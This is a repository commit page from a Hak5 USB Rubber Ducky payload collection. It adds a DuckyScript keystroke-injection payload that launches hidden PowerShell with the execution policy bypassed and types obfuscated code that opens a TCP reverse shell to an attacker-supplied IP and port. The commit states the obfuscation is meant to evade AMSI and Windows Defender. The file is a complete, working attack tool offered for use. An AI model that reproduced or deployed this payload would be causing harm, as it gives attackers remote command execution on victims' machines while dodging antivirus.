hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Uploaded ReverseDuckyII (#11) 

ReverseDucky2 - A faster way to gain a reverse shell & easier to configure

Obfuscated Powershell code to bypass AMSI & Windows Defender.
pull/13/head
0iphor13 2021-08-10 22:31:25 +02:00 committed by GitHub
parent e84b1b1338
commit 01de78b311
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 35 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

35
library/payloads/remote_access/ReverseDuckyII.txt Normal file
View File

@ -0,0 +1,35 @@
REM ReverseDucky2
REM Version 1.0
REM OS: Windows / Linux(?) (Not tested with Powershell on Linux)
REM Author: 0iphor13
REM Reverse shell executed in the background
REM Fill in Attacker-IP and Port in Line 19
REM DON'T FORGET TO START LISTENER
DELAY 1500
GUI r
DELAY 500
STRING powershell -NoP -NonI -W hidden -Exec Bypass
DELAY 250
ENTER
DELAY 200
STRING $IP='0.0.0.0';$Port=4444;$client = .('N'+'ew-O'+'bject') sYSteM.neT.soCKETs.TcPCLient
DELAY 200
STRING ($IP,$Port);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|.('%'){0};while(($i = $s
DELAY 200
STRING tream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (.('Ne'+'w-O'+'bject') -TypeName SystE
DELAY 200
STRING M.tEXt.aSCiIEnCodinG).GetString($bytes,0, $i);$sendback = (.('i'+'ex') $data 2>&1 | .('Ou
DELAY 200
STRING t-'+'Str'+'in'+'g') );$sendback2 = $sendback + 'PS ' + (&('p'+'wd')).Path + '> ';$sendbyt
DELAY 200
STRING e = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Len
DELAY 200
STRING gth);$stream.Flush()};$client.Close()
DELAY 100
ENTER